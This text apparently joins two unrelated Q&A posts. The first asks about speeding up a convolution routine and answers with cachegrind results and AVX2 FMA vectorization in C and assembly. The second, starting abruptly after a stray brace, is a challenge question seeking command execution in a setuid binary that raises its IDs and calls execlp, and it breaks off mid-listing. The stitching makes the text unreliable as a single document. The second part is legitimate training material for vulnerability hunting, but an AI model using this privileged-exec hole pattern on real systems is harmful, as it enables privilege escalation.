78f0: 4c 89 8d 48 ff ff ff mov QWORD PTR [rbp-0xb8],r9
78f7: 48 0f af d1 imul rdx,rcx
78fb: 48 8d 3c 95 00 00 00 00 lea rdi,[rdx*4+0x0]
7903: 45 85 d2 test r10d,r10d
7906: 0f 8e 73 02 00 00 jle 7b7f <convolution2D+0x2ff>
790c: 48 c1 ef 02 shr rdi,0x2
7910: 49 c1 e9 02 shr r9,0x2
7914: 48 89 7d c8 mov QWORD PTR [rbp-0x38],rdi
7918: 4c 89 e7 mov rdi,r12
791b: 4c 89 8d 58 ff ff ff mov QWORD PTR [rbp-0xa8],r9
7922: 48 c1 ef 02 shr rdi,0x2
7926: 48 89 bd 50 ff ff ff mov QWORD PTR [rbp-0xb0],rdi
792d: 45 85 c0 test r8d,r8d
7930: 0f 8e 49 02 00 00 jle 7b7f <convolution2D+0x2ff>
7936: 48 c1 e6 02 shl rsi,0x2
793a: 48 0f af d1 imul rdx,rcx
793e: 29 c3 sub ebx,eax
7940: 89 c7 mov edi,eax
7942: 48 89 b5 30 ff ff ff mov QWORD PTR [rbp-0xd0],rsi
7949: 48 8b 75 20 mov rsi,QWORD PTR [rbp+0x20]
794d: 48 89 85 68 ff ff ff mov QWORD PTR [rbp-0x98],rax
7954: f7 df neg edi
7956: 45 8d 7e ff lea r15d,[r14-0x1]
795a: 89 9d 70 ff ff ff mov DWORD PTR [rbp-0x90],ebx
7960: 89 bd 3c ff ff ff mov DWORD PTR [rbp-0xc4],edi
7966: 48 8d 0c 95 00 00 00 00 lea rcx,[rdx*4+0x0]
796e: 89 7d ac mov DWORD PTR [rbp-0x54],edi
7971: 89 5d d4 mov DWORD PTR [rbp-0x2c],ebx
7974: 48 89 4d 98 mov QWORD PTR [rbp-0x68],rcx
7978: 4a 8d 0c 9d 00 00 00 00 lea rcx,[r11*4+0x0]
7980: c7 45 80 00 00 00 00 mov DWORD PTR [rbp-0x80],0x0
7987: 48 89 75 88 mov QWORD PTR [rbp-0x78],rsi
798b: 41 8d 70 ff lea esi,[r8-0x1]
798f: 48 89 4d c0 mov QWORD PTR [rbp-0x40],rcx
7993: 48 8d 04 b5 04 00 00 00 lea rax,[rsi*4+0x4]
799b: c7 45 90 00 00 00 00 mov DWORD PTR [rbp-0x70],0x0
79a2: 48 89 85 28 ff ff ff mov QWORD PTR [rbp-0xd8],rax
79a9: 44 89 f0 mov eax,r14d
79ac: 45 89 ee mov r14d,r13d
79af: 41 89 c5 mov r13d,eax
79b2: 48 8b 85 28 ff ff ff mov rax,QWORD PTR [rbp-0xd8]
79b9: 48 03 45 88 add rax,QWORD PTR [rbp-0x78]
79bd: 48 c7 85 78 ff ff ff 00 00 00 00 mov QWORD PTR [rbp-0x88],0x0
79c8: c7 45 84 00 00 00 00 mov DWORD PTR [rbp-0x7c],0x0
79cf: c7 45 94 00 00 00 00 mov DWORD PTR [rbp-0x6c],0x0
79d6: 44 8b 95 70 ff ff ff mov r10d,DWORD PTR [rbp-0x90]
79dd: 48 89 45 b0 mov QWORD PTR [rbp-0x50],rax
79e1: 48 63 45 80 movsxd rax,DWORD PTR [rbp-0x80]
79e5: 48 2b 85 68 ff ff ff sub rax,QWORD PTR [rbp-0x98]
79ec: 48 0f af 85 60 ff ff ff imul rax,QWORD PTR [rbp-0xa0]
79f4: 48 89 85 40 ff ff ff mov QWORD PTR [rbp-0xc0],rax
79fb: 8b 85 3c ff ff ff mov eax,DWORD PTR [rbp-0xc4]
7a01: 89 45 d0 mov DWORD PTR [rbp-0x30],eax
7a04: 48 8b 45 88 mov rax,QWORD PTR [rbp-0x78]
7a08: 48 8b 9d 78 ff ff ff mov rbx,QWORD PTR [rbp-0x88]
7a0f: 4c 8d 04 98 lea r8,[rax+rbx*4]
7a13: 48 8b 45 28 mov rax,QWORD PTR [rbp+0x28]
7a17: 48 8b 5d 18 mov rbx,QWORD PTR [rbp+0x18]
7a1b: 48 89 45 b8 mov QWORD PTR [rbp-0x48],rax
7a1f: 48 63 45 84 movsxd rax,DWORD PTR [rbp-0x7c]
7a23: 48 2b 85 68 ff ff ff sub rax,QWORD PTR [rbp-0x98]
7a2a: 48 0f af 85 50 ff ff ff imul rax,QWORD PTR [rbp-0xb0]
7a32: 48 03 85 40 ff ff ff add rax,QWORD PTR [rbp-0xc0]
7a39: 48 8d 04 83 lea rax,[rbx+rax*4]
7a3d: 48 89 45 a0 mov QWORD PTR [rbp-0x60],rax
7a41: 66 66 2e 0f 1f 84 00 00 00 00 00 data16 nop WORD PTR cs:[rax+rax*1+0x0]
7a4c: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
7a50: 8b 45 a8 mov eax,DWORD PTR [rbp-0x58]
7a53: 41 c7 00 00 00 00 00 mov DWORD PTR [r8],0x0
7a5a: 45 31 db xor r11d,r11d
7a5d: 48 8b 5d a0 mov rbx,QWORD PTR [rbp-0x60]
7a61: 44 8b 4d ac mov r9d,DWORD PTR [rbp-0x54]
7a65: 85 c0 test eax,eax
7a67: 0f 8e 98 00 00 00 jle 7b05 <convolution2D+0x285>
7a6d: 0f 1f 00 nop DWORD PTR [rax]
7a70: 45 85 c9 test r9d,r9d
7a73: 78 7b js 7af0 <convolution2D+0x270>
7a75: 45 39 ce cmp r14d,r9d
7a78: 7e 76 jle 7af0 <convolution2D+0x270>
7a7a: 48 8b 45 b8 mov rax,QWORD PTR [rbp-0x48]
7a7e: 8b 55 d0 mov edx,DWORD PTR [rbp-0x30]
7a81: 48 89 de mov rsi,rbx
7a84: 4a 8d 3c 98 lea rdi,[rax+r11*4]
7a88: eb 13 jmp 7a9d <convolution2D+0x21d>
7a8a: 66 0f 1f 44 00 00 nop WORD PTR [rax+rax*1+0x0]
7a90: ff c2 inc edx
7a92: 4c 01 e7 add rdi,r12
7a95: 4c 01 e6 add rsi,r12
7a98: 44 39 d2 cmp edx,r10d
7a9b: 74 53 je 7af0 <convolution2D+0x270>
7a9d: 85 d2 test edx,edx
7a9f: 78 ef js 7a90 <convolution2D+0x210>
7aa1: 41 39 d6 cmp r14d,edx
7aa4: 7e ea jle 7a90 <convolution2D+0x210>
7aa6: 45 85 ed test r13d,r13d
7aa9: 7e e5 jle 7a90 <convolution2D+0x210>
7aab: c4 c1 7a 10 08 vmovss xmm1,DWORD PTR [r8]
7ab0: 31 c0 xor eax,eax
7ab2: 66 66 2e 0f 1f 84 00 00 00 00 00 data16 nop WORD PTR cs:[rax+rax*1+0x0]
7abd: 0f 1f 00 nop DWORD PTR [rax]
7ac0: c5 fa 10 04 87 vmovss xmm0,DWORD PTR [rdi+rax*4]
7ac5: 48 89 c1 mov rcx,rax
7ac8: c5 fa 59 04 86 vmulss xmm0,xmm0,DWORD PTR [rsi+rax*4]
7acd: 48 ff c0 inc rax
7ad0: c5 f2 58 c8 vaddss xmm1,xmm1,xmm0
7ad4: c4 c1 7a 11 08 vmovss DWORD PTR [r8],xmm1
7ad9: 49 39 cf cmp r15,rcx
7adc: 75 e2 jne 7ac0 <convolution2D+0x240>
7ade: ff c2 inc edx
7ae0: 4c 01 e7 add rdi,r12
7ae3: 4c 01 e6 add rsi,r12
7ae6: 44 39 d2 cmp edx,r10d
7ae9: 75 b2 jne 7a9d <convolution2D+0x21d>
7aeb: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]
7af0: 4c 03 5d c8 add r11,QWORD PTR [rbp-0x38]
7af4: 48 03 5d c0 add rbx,QWORD PTR [rbp-0x40]
7af8: 41 ff c1 inc r9d
7afb: 44 3b 4d d4 cmp r9d,DWORD PTR [rbp-0x2c]
7aff: 0f 85 6b ff ff ff jne 7a70 <convolution2D+0x1f0>
7b05: 48 8b 5d 98 mov rbx,QWORD PTR [rbp-0x68]
7b09: 49 83 c0 04 add r8,0x4
7b0d: 48 01 5d b8 add QWORD PTR [rbp-0x48],rbx
7b11: 4c 3b 45 b0 cmp r8,QWORD PTR [rbp-0x50]
7b15: 0f 85 35 ff ff ff jne 7a50 <convolution2D+0x1d0>
7b1b: 8b 9d 74 ff ff ff mov ebx,DWORD PTR [rbp-0x8c]
7b21: 8b 45 94 mov eax,DWORD PTR [rbp-0x6c]
7b24: 48 8b 8d 48 ff ff ff mov rcx,QWORD PTR [rbp-0xb8]
7b2b: 01 5d d0 add DWORD PTR [rbp-0x30],ebx
7b2e: 48 01 4d b0 add QWORD PTR [rbp-0x50],rcx
7b32: 01 5d 84 add DWORD PTR [rbp-0x7c],ebx
7b35: 48 8b 8d 58 ff ff ff mov rcx,QWORD PTR [rbp-0xa8]
7b3c: 41 01 da add r10d,ebx
7b3f: 48 01 8d 78 ff ff ff add QWORD PTR [rbp-0x88],rcx
7b46: ff c0 inc eax
7b48: 39 85 38 ff ff ff cmp DWORD PTR [rbp-0xc8],eax
7b4e: 74 08 je 7b58 <convolution2D+0x2d8>
7b50: 89 45 94 mov DWORD PTR [rbp-0x6c],eax
7b53: e9 ac fe ff ff jmp 7a04 <convolution2D+0x184>
7b58: 8b 4d 90 mov ecx,DWORD PTR [rbp-0x70]
7b5b: 48 8b b5 30 ff ff ff mov rsi,QWORD PTR [rbp-0xd0]
7b62: 01 5d d4 add DWORD PTR [rbp-0x2c],ebx
7b65: 01 5d ac add DWORD PTR [rbp-0x54],ebx
7b68: 01 5d 80 add DWORD PTR [rbp-0x80],ebx
7b6b: 48 01 75 88 add QWORD PTR [rbp-0x78],rsi
7b6f: 8d 41 01 lea eax,[rcx+0x1]
7b72: 39 4d 94 cmp DWORD PTR [rbp-0x6c],ecx
7b75: 74 08 je 7b7f <convolution2D+0x2ff>
7b77: 89 45 90 mov DWORD PTR [rbp-0x70],eax
7b7a: e9 33 fe ff ff jmp 79b2 <convolution2D+0x132>
7b7f: 48 81 c4 b0 00 00 00 add rsp,0xb0
7b86: 5b pop rbx
7b87: 41 5c pop r12
7b89: 41 5d pop r13
7b8b: 41 5e pop r14
7b8d: 41 5f pop r15
7b8f: 5d pop rbp
7b90: c3 ret
7b91: 66 66 2e 0f 1f 84 00 00 00 00 00 data16 nop WORD PTR cs:[rax+rax*1+0x0]
7b9c: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
For reference, I'm using an AMD Ryzen 7 CPU which uses Zen2 architecture. Here is its list of instructions (page 101).
I suspect that the data here points to a memory issue instead of simply the multiplication being the cause of the bottleneck.
Question:
How can I improve this code so that it does not cause a memory bottleneck?
I'm guessing this is actually a problem particular to my code, perhaps something related to the multidimensional arrays I'm using. If I instead used one big single-dimensional array for each variable, would the latency decrease?
Relevant information:
There are two ways I declare the variables that are passed to this function. The first is as a global variable (usually in a struct), the second is as dynamic allocation:
float (*arr)[x][y] = calloc(z, sizeof *arr);
Perhaps the order in which I declare these matrixes is not cache-friendly, but I am not sure how to re-order it.
Stride values for the previous function are always 1 or 2, usually 1.
Here is the output of valgrind --tool=cachegrind:
==430300== Cachegrind, a cache and branch-prediction profiler
==430300== Copyright (C) 2002-2017, and GNU GPL'd, by Nicholas Nethercote et al.
==430300== Using Valgrind-3.15.0 and LibVEX; rerun with -h for copyright info
==430300== Command: ./EmbeddedNet test 1
==430300== Parent PID: 170008
==430300==
--430300-- warning: L3 cache found, using its data for the LL simulation.
==430300==
==430300== I refs: 6,369,594,192
==430300== I1 misses: 4,271
==430300== LLi misses: 2,442
==430300== I1 miss rate: 0.00%
==430300== LLi miss rate: 0.00%
==430300==
==430300== D refs: 2,064,233,110 (1,359,003,131 rd + 705,229,979 wr)
==430300== D1 misses: 34,476,969 ( 19,010,839 rd + 15,466,130 wr)
==430300== LLd misses: 5,311,277 ( 1,603,955 rd + 3,707,322 wr)
==430300== D1 miss rate: 1.7% ( 1.4% + 2.2% )
==430300== LLd miss rate: 0.3% ( 0.1% + 0.5% )
==430300==
==430300== LL refs: 34,481,240 ( 19,015,110 rd + 15,466,130 wr)
==430300== LL misses: 5,313,719 ( 1,606,397 rd + 3,707,322 wr)
==430300== LL miss rate: 0.1% ( 0.0% + 0.5% )
Looking at the result of Cachegrind, it doesn't look like the memory is your bottleneck. The NN has to be stored in memory anyway, but if it's too large that your program's having a lot of L1 cache misses, then it's worth thinking to try to minimize L1 misses, but 1.7% of L1 (data) miss rate is not a problem.
So you're trying to make this run fast anyway. Looking at your code, what's happening at the most inner loop is very simple (load-> multiply -> add -> store), and it doesn't have any side effect other than the final store. This kind of code is easily parallelizable, for example, by multithreading or vectorizing. I think you'll know how to make this run in multiple threads seeing that you can write code with some complexity, and you asked in comments how to manually vectorize the code.
I will explain that part, but one thing to bear in mind is that once you choose to manually vectorize the code, it will often be tied to certain CPU architectures. Let's not consider non-AMD64 compatible CPUs like ARM. Still, you have the option of MMX, SSE, AVX, and AVX512 to choose as an extension for vectorized computation, and each extension has multiple versions. If you want maximum portability, SSE2 is a reasonable choice. SSE2 appeared with Pentium 4, and it supports 128-bit vectors. For this post I'll use AVX2, which supports 128-bit and 256-bit vectors. It runs fine on your CPU, and has reasonable portability these days, supported from Haswell (2013) and Excavator (2015).
The pattern you're using in the inner loop is called FMA (fused multiply and add). AVX2 has an instruction for this. Have a look at this function and the compiled output.
/* Scalar fused multiply-add: returns a * b + c. */
float fma_scl(float a, float b, float c) {
    float product = a * b;
    return product + c;
}
fma_scl:
vfmadd132ss xmm0, xmm2, xmm1
ret
You can see the calculation done with a single instruction.
We'll define a 256-bit vector type using GCC's vector extension.
typedef float Vec __attribute__((vector_size(32), aligned(32)));
Here's a vectorized fma function.
/* Lane-wise fused multiply-add over a 256-bit float vector: a * b + c. */
Vec fma_vec(Vec a, Vec b, Vec c) {
    Vec product = a * b;
    return product + c;
}
fma_vec:
vfmadd132ps ymm0, ymm2, ymm1
ret
The code above is semantically the same as the one below, but everything is done in a single instruction.
typedef struct {
    float f[8];
} Vec_;

/* Scalar reference for the vectorized FMA: out.f[i] = a.f[i] * b.f[i] + c.f[i]
 * for each of the 8 lanes. */
Vec_ fma_vec_(Vec_ a, Vec_ b, Vec_ c) {
    Vec_ out;
    unsigned lane = 0;
    while (lane < 8) {
        out.f[lane] = a.f[lane] * b.f[lane] + c.f[lane];
        ++lane;
    }
    return out;
}
I think you'll now get the idea of making code run faster by vectorization.
Here is a simple function that's somewhat similar to your inner loop.
/* In-place update a[i] = b[i] * c[i] + a[i] for i in [0, n), one scalar
 * FMA per element. */
void loopadd_scl(float *restrict a, float *restrict b, float *restrict c, unsigned n) {
    unsigned idx = 0;
    while (idx != n) {
        a[idx] = fma_scl(b[idx], c[idx], a[idx]);
        ++idx;
    }
}
When you compile through GCC with -O3 -march=znver2, this is the output. It's huge. I'll explain below.
loopadd_scl:
test ecx, ecx
je .L25
lea eax, [rcx-1]
cmp eax, 6
jbe .L13
mov r8d, ecx
xor eax, eax
shr r8d, 3
sal r8, 5
.L9:
vmovups ymm1, YMMWORD PTR [rdi+rax]
vmovups ymm0, YMMWORD PTR [rdx+rax]
vfmadd132ps ymm0, ymm1, YMMWORD PTR [rsi+rax]
vmovups YMMWORD PTR [rdi+rax], ymm0
add rax, 32
cmp r8, rax
jne .L9
mov eax, ecx
and eax, -8
test cl, 7
je .L26
vzeroupper
.L8:
mov r9d, ecx
sub r9d, eax
lea r8d, [r9-1]
cmp r8d, 2
jbe .L11
mov r8d, eax
sal r8, 2
lea r10, [rdi+r8]
vmovups xmm0, XMMWORD PTR [rdx+r8]
vmovups xmm2, XMMWORD PTR [r10]
vfmadd132ps xmm0, xmm2, XMMWORD PTR [rsi+r8]
mov r8d, r9d
and r8d, -4
add eax, r8d
and r9d, 3
vmovups XMMWORD PTR [r10], xmm0
je .L25
.L11:
mov r8d, eax
sal r8, 2
lea r9, [rdi+r8]
vmovss xmm0, DWORD PTR [rdx+r8]
vmovss xmm3, DWORD PTR [r9]
vfmadd132ss xmm0, xmm3, DWORD PTR [rsi+r8]
lea r8d, [rax+1]
vmovss DWORD PTR [r9], xmm0
cmp r8d, ecx
jnb .L25
sal r8, 2
add eax, 2
lea r9, [rdi+r8]
vmovss xmm0, DWORD PTR [rsi+r8]
vmovss xmm4, DWORD PTR [r9]
vfmadd132ss xmm0, xmm4, DWORD PTR [rdx+r8]
vmovss DWORD PTR [r9], xmm0
cmp eax, ecx
jnb .L25
sal rax, 2
add rdi, rax
vmovss xmm0, DWORD PTR [rdx+rax]
vmovss xmm5, DWORD PTR [rdi]
vfmadd132ss xmm0, xmm5, DWORD PTR [rsi+rax]
vmovss DWORD PTR [rdi], xmm0
.L25:
ret
.L26:
vzeroupper
ret
.L13:
xor eax, eax
jmp .L8
Basically GCC doesn't know anything about n, so it splits the loop into 3 cases: 8 or more elements remaining, 4 to 7 remaining, and fewer than 4 remaining. It first processes 8 elements at a time using 256-bit ymm registers. Then it handles a remainder of 4 or more with 128-bit xmm registers. Finally, it finishes the last few elements with scalar ss instructions.
You can avoid this mess if you know n is a multiple of 8. I got a bit lazy now, so have a look at the code and the compiler output below and compare it with the above. I think you're smart enough to get the idea.
/* Vectorized in-place a[i] = b[i] * c[i] + a[i]; n is the element count and
 * is assumed to be a multiple of 8 (8 floats per 256-bit vector). */
void loopadd_vec(Vec *restrict a, Vec *restrict b, Vec *restrict c, unsigned n) {
    unsigned vec_count = n / 8;
    for (unsigned v = 0; v != vec_count; ++v) {
        a[v] = fma_vec(b[v], c[v], a[v]);
    }
}
loopadd_vec:
shr ecx, 3
je .L34
mov ecx, ecx
xor eax, eax
sal rcx, 5
.L29:
vmovaps ymm1, YMMWORD PTR [rdi+rax]
vmovaps ymm0, YMMWORD PTR [rdx+rax]
vfmadd132ps ymm0, ymm1, YMMWORD PTR [rsi+rax]
vmovaps YMMWORD PTR [rdi+rax], ymm0
add rax, 32
cmp rcx, rax
jne .L29
vzeroupper
.L34:
ret
}

Is there a command execution vulnerability in this C program?

So I am working on a challenge problem to find a vulnerability in a C program binary that allows a command to be executed by the program (using the effective UID in Linux).
I am really struggling to find how to do this with this particular program.
The disassembly of the function in question (main function):
**************************************************************
* *
* FUNCTION *
**************************************************************
int __cdecl main(int argc, char * * argv)
int EAX:4 <RETURN>
int Stack[0x4]:4 argc
char * * Stack[0x8]:4 argv XREF[2]: 000109b0(R),
000109dd(R)
undefined4 Stack[-0x8]:4 local_8 XREF[1]: 00010bcb(R)
int Stack[-0xc]:4 in XREF[5]: 000109f0(W),
000109f3(R),
00010ad4(R),
00010b27(R),
00010b59(R)
int Stack[-0x10]:4 fd XREF[6]: 00010a1f(W),
00010a22(R),
00010aa5(R),
00010ab2(R),
00010ac9(R),
00010b4e(R)
pid_t Stack[-0x14]:4 pid XREF[4]: 00010a6b(W),
00010a6e(R),
00010a8b(R),
00010b6a(R)
int[2] Stack[-0x1c]:8 pipefd XREF[3,3]: 00010a3f(*),
00010a95(R),
00010b42(R),
00010abd(R),
00010b0f(R),
00010b36(R)
char Stack[-0x1d]:1 c XREF[2]: 00010b14(*),
00010b23(*)
int Stack[-0x24]:4 status XREF[2]: 00010b66(*),
00010b75(R)
main XREF[5]: Entry Point(*),
_start:00010866(*), 00010d30,
00010da0(*), 00011f34(*)
0001097d 55 PUSH EBP
0001097e 89 e5 MOV EBP,ESP
00010980 53 PUSH EBX
00010981 83 ec 1c SUB ESP,0x1c
00010984 e8 87 16 CALL <EXTERNAL>::geteuid __uid_t geteuid(void)
00 00
00010989 89 c3 MOV EBX,EAX
0001098b e8 80 16 CALL <EXTERNAL>::geteuid __uid_t geteuid(void)
00 00
00010990 53 PUSH EBX
00010991 50 PUSH EAX
00010992 e8 9d 16 CALL <EXTERNAL>::setreuid int setreuid(__uid_t __ruid, __u
00 00
00010997 83 c4 08 ADD ESP,0x8
0001099a e8 75 16 CALL <EXTERNAL>::getegid __gid_t getegid(void)
00 00
0001099f 89 c3 MOV EBX,EAX
000109a1 e8 6e 16 CALL <EXTERNAL>::getegid __gid_t getegid(void)
00 00
000109a6 53 PUSH EBX
000109a7 50 PUSH EAX
000109a8 e8 9b 16 CALL <EXTERNAL>::setregid int setregid(__gid_t __rgid, __g
00 00
000109ad 83 c4 08 ADD ESP,0x8
000109b0 8b 45 0c MOV EAX,dword ptr [EBP + argv]
000109b3 83 c0 04 ADD EAX,0x4
000109b6 8b 00 MOV EAX,dword ptr [EAX]
000109b8 85 c0 TEST EAX,EAX
000109ba 75 21 JNZ LAB_000109dd
000109bc a1 98 1f MOV EAX,[stderr]
01 00
000109c1 50 PUSH EAX
000109c2 6a 22 PUSH 0x22
000109c4 6a 01 PUSH 0x1
000109c6 68 50 0c PUSH s_Please_specify_the_file_to_verif_00010c50 = "Please specify the file to ve
01 00
000109cb e8 50 16 CALL <EXTERNAL>::fwrite size_t fwrite(void * __ptr, size
00 00
000109d0 83 c4 10 ADD ESP,0x10
000109d3 b8 01 00 MOV EAX,0x1
00 00
000109d8 e9 ee 01 JMP LAB_00010bcb
00 00
LAB_000109dd XREF[1]: 000109ba(j)
000109dd 8b 45 0c MOV EAX,dword ptr [EBP + argv]
000109e0 83 c0 04 ADD EAX,0x4
000109e3 8b 00 MOV EAX,dword ptr [EAX]
000109e5 6a 00 PUSH 0x0
000109e7 50 PUSH EAX
000109e8 e8 43 16 CALL <EXTERNAL>::open int open(char * __file, int __of
00 00
000109ed 83 c4 08 ADD ESP,0x8
000109f0 89 45 f8 MOV dword ptr [EBP + in],EAX
000109f3 83 7d f8 00 CMP dword ptr [EBP + in],0x0
000109f7 79 17 JNS LAB_00010a10
000109f9 68 73 0c PUSH DAT_00010c73 = 6Fh o
01 00
000109fe e8 19 16 CALL <EXTERNAL>::perror void perror(char * __s)
00 00
00010a03 83 c4 04 ADD ESP,0x4
00010a06 b8 02 00 MOV EAX,0x2
00 00
00010a0b e9 bb 01 JMP LAB_00010bcb
00 00
LAB_00010a10 XREF[1]: 000109f7(j)
00010a10 6a 02 PUSH 0x2
00010a12 68 78 0c PUSH s_/dev/null_00010c78 = "/dev/null"
01 00
00010a17 e8 14 16 CALL <EXTERNAL>::open int open(char * __file, int __of
00 00
00010a1c 83 c4 08 ADD ESP,0x8
00010a1f 89 45 f4 MOV dword ptr [EBP + fd],EAX
00010a22 83 7d f4 00 CMP dword ptr [EBP + fd],0x0
00010a26 79 17 JNS LAB_00010a3f
00010a28 68 73 0c PUSH DAT_00010c73 = 6Fh o
01 00
00010a2d e8 ea 15 CALL <EXTERNAL>::perror void perror(char * __s)
00 00
00010a32 83 c4 04 ADD ESP,0x4
00010a35 b8 05 00 MOV EAX,0x5
00 00
00010a3a e9 8c 01 JMP LAB_00010bcb
00 00
LAB_00010a3f XREF[1]: 00010a26(j)
00010a3f 8d 45 e8 LEA EAX=>pipefd,[EBP + -0x18]
00010a42 50 PUSH EAX
00010a43 e8 f8 15 CALL <EXTERNAL>::pipe int pipe(int * __pipedes)
00 00
00010a48 83 c4 04 ADD ESP,0x4
00010a4b 85 c0 TEST EAX,EAX
00010a4d 79 17 JNS LAB_00010a66
00010a4f 68 82 0c PUSH DAT_00010c82 = 70h p
01 00
00010a54 e8 c3 15 CALL <EXTERNAL>::perror void perror(char * __s)
00 00
00010a59 83 c4 04 ADD ESP,0x4
00010a5c b8 03 00 MOV EAX,0x3
00 00
00010a61 e9 65 01 JMP LAB_00010bcb
00 00
LAB_00010a66 XREF[1]: 00010a4d(j)
00010a66 e8 d9 15 CALL <EXTERNAL>::fork __pid_t fork(void)
00 00
00010a6b 89 45 f0 MOV dword ptr [EBP + pid],EAX
00010a6e 83 7d f0 00 CMP dword ptr [EBP + pid],0x0
00010a72 79 17 JNS LAB_00010a8b
00010a74 68 87 0c PUSH DAT_00010c87 = 66h f
01 00
00010a79 e8 9e 15 CALL <EXTERNAL>::perror void perror(char * __s)
00 00
00010a7e 83 c4 04 ADD ESP,0x4
00010a81 b8 04 00 MOV EAX,0x4
00 00
00010a86 e9 40 01 JMP LAB_00010bcb
00 00
LAB_00010a8b XREF[1]: 00010a72(j)
00010a8b 83 7d f0 00 CMP dword ptr [EBP + pid],0x0
00010a8f 0f 85 8c JNZ LAB_00010b21
00 00 00
00010a95 8b 45 e8 MOV EAX,dword ptr [EBP + pipefd[0]]
00010a98 6a 00 PUSH 0x0
00010a9a 50 PUSH EAX
00010a9b e8 60 15 CALL <EXTERNAL>::dup2 int dup2(int __fd, int __fd2)
00 00
00010aa0 83 c4 08 ADD ESP,0x8
00010aa3 6a 01 PUSH 0x1
00010aa5 ff 75 f4 PUSH dword ptr [EBP + fd]
00010aa8 e8 53 15 CALL <EXTERNAL>::dup2 int dup2(int __fd, int __fd2)
00 00
00010aad 83 c4 08 ADD ESP,0x8
00010ab0 6a 02 PUSH 0x2
00010ab2 ff 75 f4 PUSH dword ptr [EBP + fd]
00010ab5 e8 46 15 CALL <EXTERNAL>::dup2 int dup2(int __fd, int __fd2)
00 00
00010aba 83 c4 08 ADD ESP,0x8
00010abd 8b 45 ec MOV EAX,dword ptr [EBP + pipefd[1]]
00010ac0 50 PUSH EAX
00010ac1 e8 8a 15 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010ac6 83 c4 04 ADD ESP,0x4
00010ac9 ff 75 f4 PUSH dword ptr [EBP + fd]
00010acc e8 7f 15 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010ad1 83 c4 04 ADD ESP,0x4
00010ad4 ff 75 f8 PUSH dword ptr [EBP + in]
00010ad7 e8 74 15 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010adc 83 c4 04 ADD ESP,0x4
00010adf 6a 00 PUSH 0x0
00010ae1 68 8c 0c PUSH s_-asxml_00010c8c = "-asxml"
01 00
00010ae6 68 93 0c PUSH DAT_00010c93 = 74h t
01 00
00010aeb 68 93 0c PUSH DAT_00010c93 = 74h t
01 00
00010af0 e8 17 15 CALL <EXTERNAL>::execlp int execlp(char * __file, char *
00 00
00010af5 83 c4 10 ADD ESP,0x10
00010af8 68 98 0c PUSH s_execlp_00010c98 = "execlp"
01 00
00010afd e8 1a 15 CALL <EXTERNAL>::perror void perror(char * __s)
00 00
00010b02 83 c4 04 ADD ESP,0x4
00010b05 b8 05 00 MOV EAX,0x5
00 00
00010b0a e9 bc 00 JMP LAB_00010bcb
00 00
LAB_00010b0f XREF[1]: 00010b34(j)
00010b0f 8b 45 ec MOV EAX,dword ptr [EBP + pipefd[1]]
00010b12 6a 01 PUSH 0x1
00010b14 8d 55 e7 LEA EDX=>c,[EBP + -0x19]
00010b17 52 PUSH EDX
00010b18 50 PUSH EAX
00010b19 e8 1e 15 CALL <EXTERNAL>::write ssize_t write(int __fd, void * _
00 00
00010b1e 83 c4 0c ADD ESP,0xc
LAB_00010b21 XREF[1]: 00010a8f(j)
00010b21 6a 01 PUSH 0x1
00010b23 8d 45 e7 LEA EAX=>c,[EBP + -0x19]
00010b26 50 PUSH EAX
00010b27 ff 75 f8 PUSH dword ptr [EBP + in]
00010b2a e8 d5 14 CALL <EXTERNAL>::read ssize_t read(int __fd, void * __
00 00
00010b2f 83 c4 0c ADD ESP,0xc
00010b32 85 c0 TEST EAX,EAX
00010b34 75 d9 JNZ LAB_00010b0f
00010b36 8b 45 ec MOV EAX,dword ptr [EBP + pipefd[1]]
00010b39 50 PUSH EAX
00010b3a e8 11 15 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010b3f 83 c4 04 ADD ESP,0x4
00010b42 8b 45 e8 MOV EAX,dword ptr [EBP + pipefd[0]]
00010b45 50 PUSH EAX
00010b46 e8 05 15 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010b4b 83 c4 04 ADD ESP,0x4
00010b4e ff 75 f4 PUSH dword ptr [EBP + fd]
00010b51 e8 fa 14 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010b56 83 c4 04 ADD ESP,0x4
00010b59 ff 75 f8 PUSH dword ptr [EBP + in]
00010b5c e8 ef 14 CALL <EXTERNAL>::close int close(int __fd)
00 00
00010b61 83 c4 04 ADD ESP,0x4
00010b64 6a 00 PUSH 0x0
00010b66 8d 45 e0 LEA EAX=>status,[EBP + -0x20]
00010b69 50 PUSH EAX
00010b6a ff 75 f0 PUSH dword ptr [EBP + pid]
00010b6d e8 b2 14 CALL <EXTERNAL>::waitpid __pid_t waitpid(__pid_t __pid, i
00 00
00010b72 83 c4 0c ADD ESP,0xc
00010b75 8b 45 e0 MOV EAX,dword ptr [EBP + status]
00010b78 c1 f8 08 SAR EAX,0x8
00010b7b 0f b6 c0 MOVZX EAX,AL
00010b7e 83 f8 01 CMP EAX,0x1
00010b81 74 18 JZ LAB_00010b9b
00010b83 83 f8 02 CMP EAX,0x2
00010b86 74 22 JZ LAB_00010baa
00010b88 85 c0 TEST EAX,EAX
00010b8a 75 2d JNZ LAB_00010bb9
00010b8c 68 9f 0c PUSH DAT_00010c9f = 4Fh O
01 00
00010b91 e8 92 14 CALL <EXTERNAL>::puts int puts(char * __s)
00 00
00010b96 83 c4 04 ADD ESP,0x4
00010b99 eb 2b JMP LAB_00010bc6
LAB_00010b9b XREF[1]: 00010b81(j)
00010b9b 68 a4 0c PUSH s_Your_file_is_not_completely_comp_00010ca4 = "Your file is not completely c
01 00
00010ba0 e8 83 14 CALL <EXTERNAL>::puts int puts(char * __s)
00 00
00010ba5 83 c4 04 ADD ESP,0x4
00010ba8 eb 1c JMP LAB_00010bc6
LAB_00010baa XREF[1]: 00010b86(j)
00010baa 68 ca 0c PUSH s_Your_file_contains_errors_00010cca = "Your file contains errors"
01 00
00010baf e8 74 14 CALL <EXTERNAL>::puts int puts(char * __s)
00 00
00010bb4 83 c4 04 ADD ESP,0x4
00010bb7 eb 0d JMP LAB_00010bc6
LAB_00010bb9 XREF[1]: 00010b8a(j)
00010bb9 68 e4 0c PUSH s_I_can't_tell_if_your_file_is_XHT_00010ce4 = "I can't tell if your file is
01 00
00010bbe e8 65 14 CALL <EXTERNAL>::puts int puts(char * __s)
00 00
